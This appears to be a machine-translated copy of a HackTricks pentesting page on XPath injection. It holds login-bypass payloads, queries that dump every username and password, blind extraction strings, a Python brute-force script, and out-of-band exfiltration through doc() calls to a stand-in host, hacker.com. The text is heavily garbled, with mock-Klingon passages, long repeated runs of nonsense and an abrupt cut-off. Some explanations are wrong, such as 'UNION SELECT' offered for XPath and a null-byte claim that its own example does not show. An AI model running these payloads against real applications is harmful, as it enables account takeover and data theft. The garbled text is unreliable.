hacktricks/pentesting-web/xpath-injection.md

XPATH injection

htARTE (HackTricks AWS Red Team Expert) !HackTricks!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Basic Syntax

An attack technique known as XPath Injection is utilized to take advantage of applications that form XPath (XML Path Language) queries based on user input to query or navigate XML documents.

Nodes Described

Expressions are used to select various nodes in an XML document. These expressions and their descriptions are summarized below:

• nodename: All nodes with the name "nodename" are selected.
• /: Selection is made from the root node.
• //: Nodes matching the selection from the current node are selected, regardless of their location in the document.
• .: The current node is selected.
• ..: The parent of the current node is selected.
• @: Attributes are selected.

XPath Examples

Examples of path expressions and their results include:

• bookstore: All nodes named "bookstore" are selected.
• /bookstore: The root element bookstore is selected. It's noted that an absolute path to an element is represented by a path starting with a slash (/).
• bookstore/book: All book elements that are children of bookstore are selected.
• //book: All book elements in the document are selected, irrespective of their location.
• bookstore//book: All book elements that are descendants of the bookstore element are selected, no matter their position under the bookstore element.
• //@lang: All attributes named lang are selected.

Utilization of Predicates

Predicates are used to refine selections:

• /bookstore/book[1]: The first book element child of the bookstore element is selected. A workaround for IE versions 5 to 9, which index the first node as [0], is setting the SelectionLanguage to XPath through JavaScript.
• /bookstore/book[last()]: The last book element child of the bookstore element is selected.
• /bookstore/book[last()-1]: The penultimate book element child of the bookstore element is selected.
• /bookstore/book[position()<3]: The first two book elements children of the bookstore element are selected.
• //title[@lang]: All title elements with a lang attribute are selected.
• //title[@lang='en']: All title elements with a "lang" attribute value of "en" are selected.
• /bookstore/book[price>35.00]: All book elements of the bookstore with a price greater than 35.00 are selected.
• /bookstore/book[price>35.00]/title: All title elements of the book elements of the bookstore with a price greater than 35.00 are selected.

Handling of Unknown Nodes

Wildcards are employed for matching unknown nodes:

• *: Matches any element node.
• @*: Matches any attribute node.
• node(): Matches any node of any kind.

Further examples include:

• /bookstore/*: Selects all the child element nodes of the bookstore element.
• //*: Selects all elements in the document.
• //title[@*]: Selects all title elements with at least one attribute of any kind.

Example

<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
<name>pepe</name>
<password>peponcio</password>
<account>admin</account>
</user>
<user>
<name>mark</name>
<password>m12345</password>
<account>regular</account>
</user>
<user>
<name>fino</name>
<password>fino2</password>
<account>regular</account>
</user>
</data>

QapHa' pagh

XPath injection is a technique used to exploit vulnerabilities in web applications that use XPath queries to retrieve data from XML documents. By injecting malicious input into the XPath query, an attacker can manipulate the query to access unauthorized information.

To access sensitive information using XPath injection, an attacker needs to identify a vulnerable input field that is used in an XPath query. This can be a search box, a login form, or any other input field that is used to construct an XPath query.

Once a vulnerable input field is identified, the attacker can start injecting malicious input to modify the XPath query. The goal is to construct a query that will return the desired information. This can be achieved by manipulating the query to bypass authentication mechanisms, access restricted data, or retrieve confidential information.

To successfully exploit XPath injection, an attacker needs to have a good understanding of the application's XPath query structure and the underlying XML document. By carefully crafting the injected input, the attacker can control the query and retrieve the desired information.

It is important for developers to implement proper input validation and sanitization techniques to prevent XPath injection attacks. This includes validating and sanitizing user input, using parameterized queries, and implementing access controls to restrict unauthorized access to sensitive information.

By understanding the techniques and countermeasures for XPath injection, security professionals can effectively identify and mitigate these vulnerabilities in web applications.

All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name

All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()


Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)

Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"

qarDaSqa' & qabmoH Schema

XPath Injection

XPath Injection is a technique used to exploit vulnerabilities in applications that use XPath queries to retrieve data from XML databases. By injecting malicious input into the XPath query, an attacker can manipulate the query to extract sensitive information or perform unauthorized actions.

Identifying XPath Injection Vulnerabilities

To identify XPath Injection vulnerabilities, you can perform the following steps:

1. Manual Testing: Manually test the application by injecting payloads into input fields that are used in XPath queries. Look for any unexpected behavior or error messages that could indicate a successful injection.

2. Automated Scanning: Use automated scanning tools like OWASP ZAP or Burp Suite to scan the application for potential XPath Injection vulnerabilities. These tools can help identify vulnerable input fields and provide a starting point for further testing.

3. Error-Based Testing: Inject payloads that are designed to trigger specific error messages. If the application responds with error messages that reveal XPath syntax or database information, it could indicate a potential XPath Injection vulnerability.

Exploiting XPath Injection Vulnerabilities

Once you have identified an XPath Injection vulnerability, you can exploit it to steal the schema of the XML database. The schema contains information about the structure and organization of the database, including table names, column names, and data types.

To steal the schema, you can use the following techniques:

1. Union-Based Exploitation: Inject a UNION SELECT statement into the XPath query to retrieve data from other tables in the database. By manipulating the UNION SELECT statement, you can extract the schema information and display it in the application's response.

2. Error-Based Exploitation: Inject payloads that are designed to trigger specific error messages. If the application responds with error messages that reveal schema information, you can extract the information from the error message and reconstruct the schema.

3. Blind Exploitation: If the application does not provide any error messages or visible responses, you can use blind exploitation techniques to infer the schema information. This involves injecting payloads and analyzing the application's behavior to determine if the injected data is being processed correctly.

By exploiting XPath Injection vulnerabilities, you can steal the schema of the XML database and gain valuable information about the application's underlying structure. This information can be used to further exploit the application or perform targeted attacks.

and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0

#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but jus the schema)
<root>
<a>
<b></b>
</a>
<c>
<d></d>
<e></e>
<f>
<h></h>
</f>
</c>
</root>

and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)

#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))

qo'noSqa' jImej

Example of queries:

string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';

OR bypass in user and password (same value in both)

OR bypass in user and password (same value in both)

OR bypass in user and password (same value in both)

OR bypass in user and password (same value in both)

' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())

Select account
Select the account using the username and use one of the previous values in the password field

QaD jatlhqa' null injection

---

Description

Null injection is a technique used to exploit vulnerabilities in applications that use XPath queries to retrieve data from XML documents. By injecting a null character (\x00) into the XPath query, an attacker can bypass input validation and potentially retrieve sensitive information or manipulate the application's behavior.

Exploitation

To exploit null injection, an attacker needs to identify a vulnerable XPath query in the application. This can typically be found by analyzing the application's source code or by using a web proxy tool to intercept and modify the XPath queries sent by the application.

Once a vulnerable XPath query is identified, the attacker can inject a null character (\x00) into the query to terminate the string and bypass any input validation that may be in place. This can be done by appending the null character to the end of the user-controlled input.

For example, consider the following vulnerable XPath query:

//users/user[name='$input']

To exploit this vulnerability using null injection, the attacker can provide the following input:

' or 1=1 or ''='

The modified XPath query would then become:

//users/user[name='' or 1=1 or ''='']

By injecting the null character, the attacker can bypass any input validation that may be checking for the presence of a closing quote (') and retrieve all user records from the XML document.

Prevention

To prevent null injection attacks, it is important to properly validate and sanitize user input before using it in XPath queries. This can be done by using parameterized XPath queries or by properly escaping user-controlled input.

Additionally, it is recommended to implement least privilege principles and restrict the permissions of the user account used by the application to access the XML document. This can help mitigate the impact of a successful null injection attack.

---

QaD

Qap

Null injection Hoch qaD technique lo'laHbe'chugh XPath queries XML documents data retrieve 'e' vaj vulnerabilities exploit. XPath query vaj inject null character (\x00) vaj bypass input validation 'ej potentially retrieve sensitive information manipulate application's behavior.

Qap

Null injection Hoch exploit, Hoch attacker vulnerable XPath query application identify vaj. Hoch typically application's source code analyze vaj web proxy tool XPath queries application intercept modify vaj.

Vulnerable XPath query identify vaj, Hoch attacker null character (\x00) inject vaj terminate string bypass input validation vaj. Hoch user-controlled input end null character append vaj.

Qap

Example, vulnerable XPath query vaj:

//users/user[name='$input']

Null injection exploit Hoch, attacker provide input vaj:

' or 1=1 or ''='

Modified XPath query vaj:

//users/user[name='' or 1=1 or ''='']

Null character inject vaj, attacker bypass input validation vaj closing quote (') presence checking vaj retrieve user records XML document.

Qap

Null injection attacks prevent, user input validate sanitize properly important before XPath queries vaj use vaj. Parameterized XPath queries vaj properly escape user-controlled input vaj.

Additionally, least privilege principles implement recommend vaj restrict permissions user account application XML document access vaj. Successful null injection attack impact mitigate help vaj.

Username: ' or 1]%00

Double OR in Username or in password (is valid with only 1 vulnerable field)

QaStaHvIS: "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" "ghaH" "je" **"ghaH"

Bypass with first match
(This requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())

Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2º account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())

Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())

tlhIngan Hol tlhutlh

rInDaq jatlhpu' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'eghDI' 'ej lo'laHbe' 'e' yu'egh

/user/username[contains(., '+VALUE+')]

') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users

Blind Explotation

Get length of a value and extract it by comparisons:

tlhIngan Hol translation:

Blind Explotation

DochmeywI' pagh value length teb chaw' 'ej comparisonmeyDaq jImej:

' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"

substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value

Python Example

Python Example

import requests, string

flag = ""
l = 0
alphabet = string.ascii_letters + string.digits + "{}_()"
for i in range(30):
r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))
if ("TRUE_COND" in r.text):
l = i
break
print("[+] Password length: " + str(l))
for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
for al in alphabet:
r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)
if ("TRUE_COND" in r.text):
flag += al
print("[+] Flag: " + flag)
break

QaD jImej

QaD

QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej 